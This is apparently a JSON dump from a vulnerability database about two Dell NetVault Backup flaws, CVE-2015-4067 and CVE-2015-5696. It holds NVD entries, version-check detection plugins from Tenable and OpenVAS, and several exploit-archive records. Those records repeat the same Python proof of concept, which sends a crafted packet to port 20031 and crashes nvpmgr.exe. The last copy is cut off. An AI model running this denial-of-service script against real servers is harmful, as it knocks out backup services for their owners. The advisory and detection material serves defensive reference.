"2018-09-01T23:42:28"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": [], "cvelist": ["CVE-2015-5696", "CVE-2015-4067"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "The Dell NetVault Backup installed on the remote host is version 10.0.x prior to 10.0.5. It is, therefore, affected by the following vulnerabilities :\n\n - A flaw exists in the libnv6 module due to an integer overflow condition. A remote attacker, by manipulating a serialized object's template string specifiers, can exploit this to cause an overflow, resulting in a denial of service or the execution of arbitrary code.\n (CVE-2015-4067)\n\n - A denial of service vulnerability exists in nvpmgr.exe related to the handling of specially crafted strings, which a remote attacker can exploit to cause crash.\n (CVE-2015-5696)\n\nNote that both of these issues may be caused by the same underlying flaw and are both fixed by upgrading to the version specified by Dell.", "edition": 1, "enchantments": {}, "hash": "8cc8ec78f6b82cd54b368d17ffd5245493d93b93e3a607194601bd9ac584ae6b", "hashmap": [{"hash": "30f8a3cd16450f4fae9f6381156dd10d", "key": "modified"}, {"hash": "0bcde4285d440dd0277fbddbd871a913", "key": "cvelist"}, {"hash": "4c6596a131620cfc52eeb0f4043e32e9", "key": "published"}, {"hash": "a2aa9e3b884f4a96783c1c55cfb4e7b1", "key": "references"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "e1f700955d13ca1dab21b2c172199d78", "key": "pluginID"}, {"hash": "55e5f61d4983f1c14216d056f7a03453", "key": "naslFamily"}, {"hash": "1f13abea4734e3bf216471f4c93a6e76", "key": "sourceData"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "3c3b127aed47a502fa2e6b9ff732d305", "key": "description"}, {"hash": "dd6c22c984912e9791b24eda575f6056", "key": "title"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "e07de05eb023e2e0251a41ffc7f14baf", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=84006", "id": "NETVAULT_CVE-2015-4067_REMOTE_HBOF.NASL", "lastseen": "2016-09-26T17:24:13", "modified": "2016-05-20T00:00:00", "naslFamily": "Gain a shell remotely", "objectVersion": "1.2", "pluginID": "84006", "published": "2015-06-05T00:00:00", "references": ["http://www.nessus.org/u?9ac90bf8", "http://www.zerodayinitiative.com/advisories/ZDI-15-240/"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84006);\n script_cvs_date(\"$Date: 2016/05/20 14:21:42 $\");\n script_version(\"$Revision: 1.4 $\");\n\n script_cve_id(\"CVE-2015-4067\", \"CVE-2015-5696\");\n script_bugtraq_id(74841);\n script_osvdb_id(122595, 125604);\n script_xref(name:\"EDB-ID\", value:\"37739\");\n\n script_name(english:\"Dell NetVault Backup 10.0.x < 10.0.5 RCE\");\n script_summary(english:\"Checks the version of Dell NetVault.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote backup server is affected by a remote code execution\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Dell NetVault Backup installed on the remote host is version\n10.0.x prior to 10.0.5. It is, therefore, affected by the following\nvulnerabilities :\n\n - A flaw exists in the libnv6 module due to an integer\n overflow condition. A remote attacker, by manipulating a\n serialized object's template string specifiers, can\n exploit this to cause an overflow, resulting in a denial\n of service or the execution of arbitrary code.\n (CVE-2015-4067)\n\n - A denial of service vulnerability exists in nvpmgr.exe\n related to the handling of specially crafted strings,\n which a remote attacker can exploit to cause crash.\n (CVE-2015-5696)\n\nNote that both of these issues may be caused by the same underlying\nflaw and are both fixed by upgrading to the version specified by Dell.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.zerodayinitiative.com/advisories/ZDI-15-240/\");\n # http://documents.software.dell.com/netvault-backup/10.0.5/release-notes/resolved-issues\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9ac90bf8\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Dell NetVault Backup 10.0.5 or later.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/05/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/04/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/a:dell:netvault_backup\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Gain a shell remotely\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2016 Tenable Network Security, Inc.\");\n\n script_dependencies(\"netvault_detect.nasl\");\n script_require_ports(\"Services/nvpmgr\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\n\nappname = \"Dell NetVault\";\nport = get_kb_item_or_exit(\"Services/nvpmgr\");\nnvver = get_kb_item_or_exit(\"NetVault/\"+port+\"/NVVersion\");\ndispver = get_kb_item_or_exit(\"NetVault/\"+port+\"/DisplayVersion\");\ncover = 10000;\nif(report_paranoia > 1)\n cover = 9000; \n\n# Versions 10.0.0+ < 10.0.5\nif(int(nvver) >= cover && int(nvver) < 10005)\n{\n report = NULL;\n if(report_verbosity > 0)\n {\n report =\n '\\n Installed version : ' + dispver +\n '\\n Fixed version : 10.0.5.0'+\n '\\n';\n }\n security_hole(port:port,extra:report);\n exit(0);\n}\nelse\n audit(AUDIT_LISTEN_NOT_VULN, appname, port);\n", "title": "Dell NetVault Backup 10.0.x < 10.0.5 RCE", "type": "nessus", "viewCount": 6}, "differentElements": ["cpe"], "edition": 1, "lastseen": "2016-09-26T17:24:13"}], "edition": 10, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "7ffd93802a0e2fa26be01c6e6e50ae26"}, {"key": "cvelist", "hash": "0bcde4285d440dd0277fbddbd871a913"}, {"key": "cvss", "hash": "edfca85c4c320ffaa9dcfdcb6a20ce1d"}, {"key": "description", "hash": "66a4c0be7110d2f08f781e6de7b728c0"}, {"key": "href", "hash": "cf9b2eb1ee3344d7863a70b111a5b330"}, {"key": "modified", "hash": "abcf9266f425f12dda38f529cd4a94bc"}, {"key": "naslFamily", "hash": "55e5f61d4983f1c14216d056f7a03453"}, {"key": "pluginID", "hash": "e1f700955d13ca1dab21b2c172199d78"}, {"key": "published", "hash": "4c6596a131620cfc52eeb0f4043e32e9"}, {"key": "references", "hash": "a9ea69fb49ab3ff68fb9ceae11de5f70"}, {"key": "reporter", "hash": "83d85f0b2082533b5c390c185dd3e8ce"}, {"key": "sourceData", "hash": "1ddbae8a812015dd761d4949281d0e6b"}, {"key": "title", "hash": "dd6c22c984912e9791b24eda575f6056"}, {"key": "type", "hash": "5e0bd03bec244039678f2b955a2595aa"}], "hash": "4b45d2be36a8e0d4a415f6182f2598b077e210371338af5e79a1cdf0712104f5", "viewCount": 45, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-5696", "CVE-2015-4067"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310806003", "OPENVAS:1361412562310805653"]}, {"type": "zdt", "idList": ["1337DAY-ID-23986"]}, {"type": "exploitdb", "idList": ["EDB-ID:37739"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:14652", "SECURITYVULNS:DOC:32428"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:132928"]}, {"type": "zdi", "idList": ["ZDI-15-240"]}], "modified": "2019-11-01T02:57:40"}, "score": {"value": 7.8, "vector": "NONE", "modified": "2019-11-01T02:57:40"}, "vulnersScore": 7.8}, "objectVersion": "1.3", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84006);\n script_cvs_date(\"Date: 2018/11/15 20:50:22\");\n script_version(\"1.6\");\n\n script_cve_id(\"CVE-2015-4067\", \"CVE-2015-5696\");\n script_bugtraq_id(74841);\n script_xref(name:\"EDB-ID\", value:\"37739\");\n\n script_name(english:\"Dell NetVault Backup 10.0.x < 10.0.5 RCE\");\n script_summary(english:\"Checks the version of Dell NetVault.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote backup server is affected by a remote code execution\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Dell NetVault Backup installed on the remote host is version\n10.0.x prior to 10.0.5. It is, therefore, affected by the following\nvulnerabilities :\n\n - A flaw exists in the libnv6 module due to an integer\n overflow condition. A remote attacker, by manipulating a\n serialized object's template string specifiers, can\n exploit this to cause an overflow, resulting in a denial\n of service or the execution of arbitrary code.\n (CVE-2015-4067)\n\n - A denial of service vulnerability exists in nvpmgr.exe\n related to the handling of specially crafted strings,\n which a remote attacker can exploit to cause crash.\n (CVE-2015-5696)\n\nNote that both of these issues may be caused by the same underlying\nflaw and are both fixed by upgrading to the version specified by Dell.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-15-240/\");\n # http://documents.software.dell.com/netvault-backup/10.0.5/release-notes/resolved-issues\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9ac90bf8\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Dell NetVault Backup 10.0.5 or later.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/05/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/04/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/a:dell:netvault_backup\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Gain a shell remotely\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"netvault_detect.nasl\");\n script_require_ports(\"Services/nvpmgr\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\n\nappname = \"Dell NetVault\";\nport = get_kb_item_or_exit(\"Services/nvpmgr\");\nnvver = get_kb_item_or_exit(\"NetVault/\"+port+\"/NVVersion\");\ndispver = get_kb_item_or_exit(\"NetVault/\"+port+\"/DisplayVersion\");\ncover = 10000;\nif(report_paranoia > 1)\n cover = 9000; \n\n# Versions 10.0.0+ < 10.0.5\nif(int(nvver) >= cover && int(nvver) < 10005)\n{\n report = NULL;\n if(report_verbosity > 0)\n {\n report =\n '\\n Installed version : ' + dispver +\n '\\n Fixed version : 10.0.5.0'+\n '\\n';\n }\n security_hole(port:port,extra:report);\n exit(0);\n}\nelse\n audit(AUDIT_LISTEN_NOT_VULN, appname, port);\n", "naslFamily": "Gain a shell remotely", "pluginID": "84006", "cpe": ["cpe:/a:dell:netvault_backup"], "scheme": null}

{"cve": [{"lastseen": "2019-05-29T18:14:43", "bulletinFamily": "NVD", "description": "Dell Netvault Backup before 10.0.5 allows remote attackers to cause a denial of service (crash) via a crafted request.", "modified": "2018-10-09T19:57:00", "id": "CVE-2015-5696", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5696", "published": "2015-08-14T18:59:00", "title": "CVE-2015-5696", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:14:42", "bulletinFamily": "NVD", "description": "Integer overflow in the libnv6 module in Dell NetVault Backup before 10.0.5 allows remote attackers to execute arbitrary code via crafted template string specifiers in a serialized object, which triggers a heap-based buffer overflow.", "modified": "2016-12-06T03:02:00", "id": "CVE-2015-4067", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4067", "published": "2015-05-29T15:59:00", "title": "CVE-2015-4067", "type": "cve", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-05-29T18:36:53", "bulletinFamily": "scanner", "description": "The host is installed with Dell Netvault\n Backup and is prone to denial of service vulnerability.", "modified": "2018-10-12T00:00:00", "published": "2015-08-04T00:00:00", "id": "OPENVAS:1361412562310806003", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310806003", "title": "Dell Netvault Denial Of Service Vulnerability", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_netvault_backup_dos_vuln.nasl 11872 2018-10-12 11:22:41Z cfischer $\n#\n# Dell Netvault Denial Of Service Vulnerability\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:dell:netvault_backup\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.806003\");\n script_version(\"$Revision: 11872 $\");\n script_cve_id(\"CVE-2015-5696\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 13:22:41 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-08-04 16:15:42 +0530 (Tue, 04 Aug 2015)\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_name(\"Dell Netvault Denial Of Service Vulnerability\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Dell Netvault\n Backup and is prone to denial of service vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to insufficient\n validation of user-supplied input which cause the 'nvpmgr.exe' process on an\n affected system to crash.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to cause denial of service vulnerability (crash).\");\n\n script_tag(name:\"affected\", value:\"Dell Netvault Backup versions 10.0.1.24\n and probably prior\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Dell Netvault Backup version\n 10.0.5 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://www.scip.ch/en/?vuldb.76847\");\n script_xref(name:\"URL\", value:\"http://seclists.org/bugtraq/2015/Jul/142\");\n script_xref(name:\"URL\", value:\"https://packetstormsecurity.com/files/132928/\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_dell_netvault_backup_detect.nasl\");\n script_mandatory_keys(\"dell/netvaultbackup/installed\");\n script_require_ports(\"Services/www\", 80);\n script_xref(name:\"URL\", value:\"http://software.dell.com\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!netPort = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!netVer = get_app_version(cpe:CPE, port:netPort)){\n exit(0);\n}\n\nif(version_is_less_equal(version:netVer, test_version:\"10.0.1.24\"))\n{\n report = 'Installed Version: ' +netVer+ '\\n' +\n 'Fixed Version: '+\"10.0.5\"+ '\\n';\n security_message(data:report, port:netPort);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:36:04", "bulletinFamily": "scanner", "description": "The host is installed with Dell Netvault\n Backup and is prone to integer overflow vulnerability.", "modified": "2018-10-12T00:00:00", "published": "2015-06-17T00:00:00", "id": "OPENVAS:1361412562310805653", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805653", "title": "Dell Netvault Backup Integer Overflow Vulnerability", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_netvault_backup_integer_overflow_vuln.nasl 11872 2018-10-12 11:22:41Z cfischer $\n#\n# Dell Netvault Backup Integer Overflow Vulnerability\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:dell:netvault_backup\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805653\");\n script_version(\"$Revision: 11872 $\");\n script_cve_id(\"CVE-2015-4067\");\n script_bugtraq_id(74841);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 13:22:41 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-06-17 14:20:46 +0530 (Wed, 17 Jun 2015)\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_name(\"Dell Netvault Backup Integer Overflow Vulnerability\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Dell Netvault\n Backup and is prone to integer overflow vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to a vulnerability in\n libnv6 module in netvault backup.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute arbitrary code and cause an integer overflow resulting\n in an undersized allocation and eventually a heap overflow.\");\n\n script_tag(name:\"affected\", value:\"Dell Netvault Backup versions before 10.0.5\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Dell Netvault Backup version\n 10.0.5.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://sec.hpi.de/vulndb/details/CVE-2015-4067\");\n script_xref(name:\"URL\", value:\"http://www.zerodayinitiative.com/advisories/ZDI-15-240\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_dell_netvault_backup_detect.nasl\");\n script_mandatory_keys(\"dell/netvaultbackup/installed\");\n script_require_ports(\"Services/www\", 80);\n script_xref(name:\"URL\", value:\"http://software.dell.com\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!netPort = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!netVer = get_app_version(cpe:CPE, port:netPort)){\n exit(0);\n}\n\nif(version_is_less(version:netVer, test_version:\"10.0.5\"))\n{\n report = 'Installed Version: ' +netVer+ '\\n' +\n 'Fixed Version: '+\"10.0.5\"+ '\\n';\n security_message(data:report, port:netPort);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-03-20T03:20:19", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category dos / poc", "modified": "2015-08-09T00:00:00", "published": "2015-08-09T00:00:00", "id": "1337DAY-ID-23986", "href": "https://0day.today/exploit/description/23986", "type": "zdt", "title": "Dell Netvault Backup 10.0.1.24 - Denial of Service Exploit", "sourceData": "\"\"\"\r\nProduct: Dell Netvault Backup\r\nLink: http://software.dell.com/products/netvault-backup/\r\nVendor: Dell\r\nVulnerable Version(s): 10.0.1.24 and probably prior\r\nTested Version: Version 10.0.1.24\r\nAdvisory Publication: July 30, 2015 \r\nVendor Notification: January 9, 2015\r\nPublic Disclosure: July 30, 2015\r\nVulnerability Type: Remote Denial of service\r\nCVE Reference: CVE-2015-5696\r\nRisk Level: Medium\r\nDiscovered and Provided: Josep Pi Rodriguez https://es.linkedin.com/pub/josep-pi-rodriguez/60/229/b24\r\n \r\n-----------------------------------------------------------------------------------------------\r\n \r\nAdvisory Details:\r\n \r\nDoing reverse engineering of the protocol was found several ways to cause a crash in the nvpmgr.exe process.The entire application (all processes) will die and it won't be able to restart again by itself unless someone do it manually.\r\n \r\nProof of concept script:\r\n\"\"\"\r\n \r\n#!/usr/bin/python\r\nimport socket as so\r\nfrom struct import *\r\n \r\nserver = \"192.168.140.130\"\r\nport = 20031\r\nd = \"\\x18\\x00\\x00\\x00\" \r\nd += \"\\x01\"\r\n \r\n#d += \"\\xCB\\x22\\x77\\xC9\" # Another crash example\r\nd += \"\\x18\\xE8\\xBE\\xC8\" # Will cause the crash\r\nd += \"\\x0B\\x00\\x00\\x00\" + \"AAAA\" + \"B\" * 6 \r\nd += \"\\x00\" # null byte\r\n \r\n##\r\n# send it\r\n \r\ns = so.socket(so.AF_INET, so.SOCK_STREAM)\r\ns.connect((server, port))\r\ns.send(d)\r\ns.close()\r\n \r\n\"\"\"\r\n-----------------------------------------------------------------------------------------------\r\n \r\nSolution:\r\n \r\nDisclosure timeline:\r\n2015-01-09 Vendor notified via email\r\n2015-05-26 Vendor notifies that the issue is fixed in version 10.0.5.x\r\n2015-07-30 Public disclosure.\r\n \r\nThe fix done by Dell was not checked by the researcher.\r\n \r\n-----------------------------------------------------------------------------------------------\r\n\"\"\"\n\n# 0day.today [2018-03-20] #", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/23986"}], "exploitdb": [{"lastseen": "2016-02-04T06:29:18", "bulletinFamily": "exploit", "description": "Dell Netvault Backup 10.0.1.24 - Denial of Service. CVE-2015-5696. Dos exploit for windows platform", "modified": "2015-08-07T00:00:00", "published": "2015-08-07T00:00:00", "id": "EDB-ID:37739", "href": "https://www.exploit-db.com/exploits/37739/", "type": "exploitdb", "title": "Dell Netvault Backup 10.0.1.24 - Denial of Service", "sourceData": "\"\"\"\r\nProduct: Dell Netvault Backup\r\nLink: http://software.dell.com/products/netvault-backup/\r\nVendor: Dell\r\nVulnerable Version(s): 10.0.1.24 and probably prior\r\nTested Version: Version 10.0.1.24\r\nAdvisory Publication: July 30, 2015 \r\nVendor Notification: January 9, 2015\r\nPublic Disclosure: July 30, 2015\r\nVulnerability Type: Remote Denial of service\r\nCVE Reference: CVE-2015-5696\r\nRisk Level: Medium\r\nDiscovered and Provided: Josep Pi Rodriguez https://es.linkedin.com/pub/josep-pi-rodriguez/60/229/b24\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nDoing reverse engineering of the protocol was found several ways to cause a crash in the nvpmgr.exe process.The entire application (all processes) will die and it won't be able to restart again by itself unless someone do it manually.\r\n\r\nProof of concept script:\r\n\"\"\"\r\n\r\n#!/usr/bin/python\r\nimport socket as so\r\nfrom struct import *\r\n\r\nserver = \"192.168.140.130\"\r\nport = 20031\r\nd = \"\\x18\\x00\\x00\\x00\" \r\nd += \"\\x01\" \r\n\r\n#d += \"\\xCB\\x22\\x77\\xC9\" # Another crash example\r\nd += \"\\x18\\xE8\\xBE\\xC8\" # Will cause the crash\r\nd += \"\\x0B\\x00\\x00\\x00\" + \"AAAA\" + \"B\" * 6 \r\nd += \"\\x00\" # null byte\r\n\r\n##\r\n# send it\r\n\r\ns = so.socket(so.AF_INET, so.SOCK_STREAM)\r\ns.connect((server, port))\r\ns.send(d)\r\ns.close()\r\n\r\n\"\"\"\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nDisclosure timeline:\r\n2015-01-09 Vendor notified via email\r\n2015-05-26 Vendor notifies that the issue is fixed in version 10.0.5.x\r\n2015-07-30 Public disclosure.\r\n\r\nThe fix done by Dell was not checked by the researcher.\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\"\"\"", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/37739/"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:02", "bulletinFamily": "software", "description": "Crash on network request parsing.", "modified": "2015-08-24T00:00:00", "published": "2015-08-24T00:00:00", "id": "SECURITYVULNS:VULN:14652", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14652", "title": "Dell Netvault Backup DoS", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:11:01", "bulletinFamily": "software", "description": "\r\n\r\nProduct: Dell Netvault Backup\r\nLink: http://software.dell.com/products/netvault-backup/\r\nVendor: Dell\r\nVulnerable Version(s): 10.0.1.24 and probably prior\r\nTested Version: Version 10.0.1.24\r\nAdvisory Publication: July 30, 2015 \r\nVendor Notification: January 9, 2015\r\nPublic Disclosure: July 30, 2015\r\nVulnerability Type: Remote Denial of service\r\nCVE Reference: CVE-2015-5696\r\nRisk Level: Medium\r\nDiscovered and Provided: Josep Pi Rodriguez https://es.linkedin.com/pub/josep-pi-rodriguez/60/229/b24\r\n\r\n------------------------------------------------------------------------\r\n-----------------------\r\n\r\nAdvisory Details:\r\n\r\nDoing reverse engineering of the protocol was found several ways to cause a crash in the nvpmgr.exe process.The entire application (all processes) will die and it won't be able to restart again by itself unless someone do it manually.\r\n\r\nProof of concept script:\r\n\r\n#!/usr/bin/python\r\nimport socket as so\r\nfrom struct import *\r\n\r\nserver = "192.168.140.130"\r\nport = 20031\r\nd = "\x18\x00\x00\x00" \r\nd += "\x01" \r\n\r\n#d += "\xCB\x22\x77\xC9" # Another crash example\r\nd += "\x18\xE8\xBE\xC8" # Will cause the crash\r\nd += "\x0B\x00\x00\x00" + "AAAA" + "B" * 6 \r\nd += "\x00" # null byte\r\n\r\n##\r\n# send it\r\n\r\ns = so.socket(so.AF_INET, so.SOCK_STREAM)\r\ns.connect((server, port))\r\ns.send(d)\r\ns.close()\r\n\r\n------------------------------------------------------------------------\r\n-----------------------\r\n\r\nSolution:\r\n\r\nDisclosure timeline:\r\n2015-01-09 Vendor notified via email\r\n2015-05-26 Vendor notifies that the issue is fixed in version 10.0.5.x\r\n2015-07-30 Public disclosure.\r\n\r\nThe fix done by Dell was not checked by the researcher.\r\n\r\n------------------------------------------------------------------------\r\n-----------------------\r\n\r\n", "modified": "2015-08-24T00:00:00", "published": "2015-08-24T00:00:00", "id": "SECURITYVULNS:DOC:32428", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32428", "title": "Dell Netvault Backup Remote Denial of Service", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:18:14", "bulletinFamily": "exploit", "description": "", "modified": "2015-07-30T00:00:00", "published": "2015-07-30T00:00:00", "href": "https://packetstormsecurity.com/files/132928/Dell-Netvault-Backup-10.0.1.24-Denial-Of-Service.html", "id": "PACKETSTORM:132928", "type": "packetstorm", "title": "Dell Netvault Backup 10.0.1.24 Denial Of Service", "sourceData": "`Product: Dell Netvault Backup \nLink: http://software.dell.com/products/netvault-backup/ \nVendor: Dell \nVulnerable Version(s): 10.0.1.24 and probably prior \nTested Version: Version 10.0.1.24 \nAdvisory Publication: July 30, 2015 \nVendor Notification: January 9, 2015 \nPublic Disclosure: July 30, 2015 \nVulnerability Type: Remote Denial of service \nCVE Reference: CVE-2015-5696 \nRisk Level: Medium \nDiscovered and Provided: Josep Pi Rodriguez https://es.linkedin.com/pub/josep-pi-rodriguez/60/229/b24 \n \n------------------------------------------------------------------------ \n----------------------- \n \nAdvisory Details: \n \nDoing reverse engineering of the protocol was found several ways to cause a crash in the nvpmgr.exe process.The entire application (all processes) will die and it won't be able to restart again by itself unless someone do it manually. \n \nProof of concept script: \n \n#!/usr/bin/python \nimport socket as so \nfrom struct import * \n \nserver = \"192.168.140.130\" \nport = 20031 \nd = \"\\x18\\x00\\x00\\x00\" \nd += 